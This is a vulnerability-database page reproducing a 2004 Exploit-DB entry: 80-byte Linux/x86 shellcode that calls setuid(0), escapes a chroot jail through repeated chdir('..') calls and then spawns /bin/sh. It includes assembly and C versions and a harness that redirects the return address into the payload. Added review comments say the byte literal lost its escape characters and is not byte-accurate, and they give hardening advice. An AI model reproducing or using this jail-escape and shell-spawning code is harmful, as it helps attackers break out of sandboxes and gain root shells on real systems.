Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)

Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)

漏洞ID 1054620 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13454
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some    *
 * ideas how to make it smaller, but till then use this one.               *
 *                                         signed predator                 *
 *                                         linux registered user : 181116  *
 *                                         preedator(at)sendmail(dot)ru    *
 ***************************************************************************/

/*
 * sc: payload bytes for the chroot()/execve() sequence named in the header
 * comment and spelled out in the "Asm code" and "C code" comments below.
 *
 * NOTE(review): the literal as rendered on this page is not byte-accurate.
 * The escape prefixes appear to have been dropped by the hosting page, so
 * what compiles here is printable text, not machine code. Use the
 * disassembly comment as the reference when analysing the sequence.
 *
 * Per the disassembly, the syscalls issued through int $0x80 are numbers
 * 0x17, 0x27, 0x3d, 0x0c and 0x0b, which on Linux/i386 are setuid, mkdir,
 * chroot, chdir and execve. The first one (ebx = 0, i.e. setuid(0)) is not
 * shown in the "C code" comment.
 *
 * NOTE(review), defensive reading: the chroot(2) calls only succeed for a
 * caller that is still root / holds CAP_SYS_CHROOT inside the jail, so bare
 * chroot is not a containment boundary for such a process. Dropping
 * privileges right after entering the jail, or confining with mount
 * namespaces + pivot_root and a seccomp filter, removes the precondition.
 * A chroot(2) call made by an already-jailed service is a useful audit
 * signal.
 */
char sc[]="x31xc0x31xdbx31xc9xb0x17xcdx80xebx36x5ex88x46x0a"
          "x8dx5ex05xb1xedxb0x27xcdx80x31xc0xb0x3dxcdx80x83"
          "xc3x02xb0x0cxcdx80xe0xfaxb0x3dxcdx80x89x76x08x31"
          "xc0x88x46x07x89x46x0cx89xf3x8dx4ex08x89xc2xb0x0b"
          "xcdx80xe8xc5xffxffxff/bin/sh..";

/*
 * Test harness from the original post: prints the length of sc, then
 * overwrites a stack slot with the address of sc instead of returning a
 * value normally.
 *
 * NOTE(review): no headers are included in the listing, so printf and
 * strlen are implicitly declared; strlen's size_t result is passed to %d,
 * and the format string as rendered ends in a literal 'n'.
 */
int main(){
  /* Point ret two pointer-sized slots above its own stack address.
   * Presumably this is the saved return address for the author's compiler
   * and frame layout -- nothing in C guarantees it; confirm per build. */
  int *ret=(int *)(&ret+2);
  printf("len : %dn",strlen(sc));
  /* Store the address of sc in that slot. The (int) cast assumes 32-bit
   * pointers. NOTE(review): where data pages are non-executable (NX/DEP),
   * a transfer into sc faults instead of running. */
  *ret=(int)sc;
}


// Asm code
/*********************************************
 *int main(){                                *
 * __asm__(" xorl %eax,%eax           n"    *
 *	   " xorl %ebx,%ebx           n"    *
 *         " xorl %ecx,%ecx           n"    *
 *	   " movb $0x17,%al           n"    *
 *	   " int  $0x80               n"    *
 *         " jmp 0x36                 n"    *
 *         " popl %esi                n"    *
 *	   " movb %al,0xa(%esi)       n"    *
 *         " leal 0x5(%esi),%ebx      n"    *
 *	   " movb $0xed,%cl           n"    *
 *	   " movb $0x27,%al           n"    *
 *	   " int $0x80                n"    *
 *         " xorl %eax,%eax           n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    * 
 *	   " addl $0x2,%ebx           n"    *
 *         " movb $0xc,%al            n"    *
 *	   " int $0x80                n"    *
 *         " loopne -0x06             n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    *
 *	   " movl %esi,0x8(%esi)      n"    * 
 *         " xorl %eax,%eax           n"    * 
 *         " movb %al,0x7(%esi)       n"    *
 *         " movl %eax,0xc(%esi)      n"    *
 *         " movl %esi,%ebx           n"    *
 *         " leal 0x8(%esi),%ecx      n"    *
 *         " movl %eax,%edx           n"    *
 *         " movb $0xb,%al            n"    *
 *         " int $0x80                n"    *
 *         " call -0x3b               n"    *
 *         " .string "/bin/sh.."    n");  *
 *}                                          *
 *********************************************/ 

//C code
/**********************************************
*int main(){                                  *
*  char *sh[2]={"/bin/sh",NULL};              *
*  int gg=0xed                                *
*  mkdir("sh..",gg);			      *
*  chroot("sh..");			      *
*  while (gg!=0){                             *
*     chdir("..");gg--;                       *
*  }                                          *
* chroot("..");                               *
* execve(sh[0],sh,NULL);                      *
*}                                            *
***********************************************/

// milw0rm.com [2004-09-12]
